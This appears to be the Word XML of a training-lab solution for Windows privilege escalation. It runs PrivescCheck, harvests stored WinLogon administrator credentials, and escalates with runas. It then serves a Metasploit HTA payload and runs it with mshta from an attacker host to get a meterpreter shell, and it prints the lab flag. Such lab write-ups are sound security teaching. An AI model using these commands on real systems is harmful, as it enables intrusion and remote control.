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0680" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E041A9E" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine and a target Windows machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DE921" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>Your task is to run </w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PrivescCheck.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> script to find a common Windows privilege escalation flaw that depends on misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8A0B9A" w14:textId="2CAD53E8" w:rsidR="00853ABF" w:rsidRDefault="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> Gain Administrator user privilege and find the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C1343" w14:textId="3B324054" w:rsidR="00256221" w:rsidRDefault="00256221">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95753F" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> Open the lab link. Switch to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBFB746" w14:textId="72FCDD64" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BAB0B33" wp14:editId="651FC5A6">
            <wp:extent cx="5943600" cy="3366770"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="766028026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B38C" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> Open the powershell.exe terminal to check the current user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A82E7C4" w14:textId="030AA32E" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BD9963E" wp14:editId="2F1C20B6">
            <wp:extent cx="5943600" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="146773265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FEE1" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">We are running as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>a student user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">. We will run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>PrivescCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> PowerShell script to find possible misconfiguration issues that can be leveraged for local privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BCBD1" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> Switch current folder to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>PrivescCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6CEBE" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E96233F" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>cd C:\Users\student\Desktop\PrivescCheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2E1A8" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527C598" w14:textId="1EF69001" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7565A5E2" wp14:editId="631B731E">
            <wp:extent cx="5943600" cy="2240915"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="851271355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30B6" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> Running PrivescCheck.ps1 script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D7D72" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A27B9E" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> -ep bypass -c ". .\PrivescCheck.ps1; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>PrivescCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D4A3F" w14:textId="1D2BDE76" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5799B561" wp14:editId="0EAECDD7">
            <wp:extent cx="5943600" cy="1806575"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="2117939300" name="Picture 1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1173" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>The scan has started and it would take 1-2 minutes to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41985C51" w14:textId="75DEA8D8" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED021D4" wp14:editId="3864D0E6">
            <wp:extent cx="5943600" cy="3730625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1860467078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782E" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">We have received the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>report</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> and we can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>notice</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> that we found </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>WinLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> credentials. Investigate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>WinLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B812DA4" w14:textId="52D456E9" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51AEA8D1" wp14:editId="25BF5677">
            <wp:extent cx="5943600" cy="1652905"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1499866207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B782" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">We have found an administrator user credential. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>administrator:hello</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_123321</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4CC247" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> We are running a command prompt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> cmd.exe as an administrator user using discovered credential and runas.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C605A5" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD35B56" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>runas.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>user:administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663EE9F" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>hello</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t>_123321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C637AE" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3952FA09" w14:textId="0B34A605" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348F3BDC" wp14:editId="6B1F2AF1">
            <wp:extent cx="5943600" cy="2969260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1076090615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ED6E" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>are running</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> cmd.exe as an administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F77DB6" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Switch to the Kali Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E8669" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> Running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>hta_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> module to gain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> shell. Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42973513" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDBE5F4" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3811A97E" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>hta_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18A0172D" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A5C900" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">“This module hosts an HTML Application (HTA) that when opened will run a payload via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031CF2ED" w14:textId="2B4F55B5" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F829E8" wp14:editId="6BD1CFD6">
            <wp:extent cx="5943600" cy="1217295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="638406001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0D1F" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">Copy the generated payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> “http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta” and run it on cmd.exe with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> command to gain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F241961" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> You need to execute the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>below payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> on the cmd.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE9B23" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Switch to Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2507A" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> Gaining a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B962C16" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B264B0B" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>mshta.exe http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1719B300" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> You need to use your own Metasploit HTA server link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4BDD9" w14:textId="37789BD4" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C6C91F5" wp14:editId="59DF6FD3">
            <wp:extent cx="5943600" cy="1313815"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1889483087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062B" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve">We can expect a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300DA5BE" w14:textId="32C4111B" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C283466" wp14:editId="61DC4211">
            <wp:extent cx="5943600" cy="1715770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196429767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4943" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> Read the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B33DA6" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50C685" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00256221">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCC585" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>cd C:\\Users\\Administrator\\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749233B0" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00256221">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27D5E5DE" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E04419" w14:textId="6474F472" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D6F2970" wp14:editId="2EDFFC3B">
            <wp:extent cx="5943600" cy="1774825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1405317497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53BD" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:t>This reveals the flag to us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11165FA4" w14:textId="77777777" w:rsidR="00256221" w:rsidRPr="00256221" w:rsidRDefault="00256221" w:rsidP="00256221">
      <w:r w:rsidRPr="00256221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00256221">
        <w:t> 2b070a650a92129c2462deae7707b0c5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E645C75" w14:textId="77777777" w:rsidR="00256221" w:rsidRDefault="00256221"/>
    <w:sectPr w:rsidR="00256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38"/>
    <w:rsid w:val="000C578F"/>
    <w:rsid w:val="00256221"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00EB7138"/>
    <w:rsid w:val="00ED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9A98"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{11CAEF6E-331F-47E6-9B14-95E1FA8C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350</Words>
  <Characters>1946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2025-12-20T06:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-20T06:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>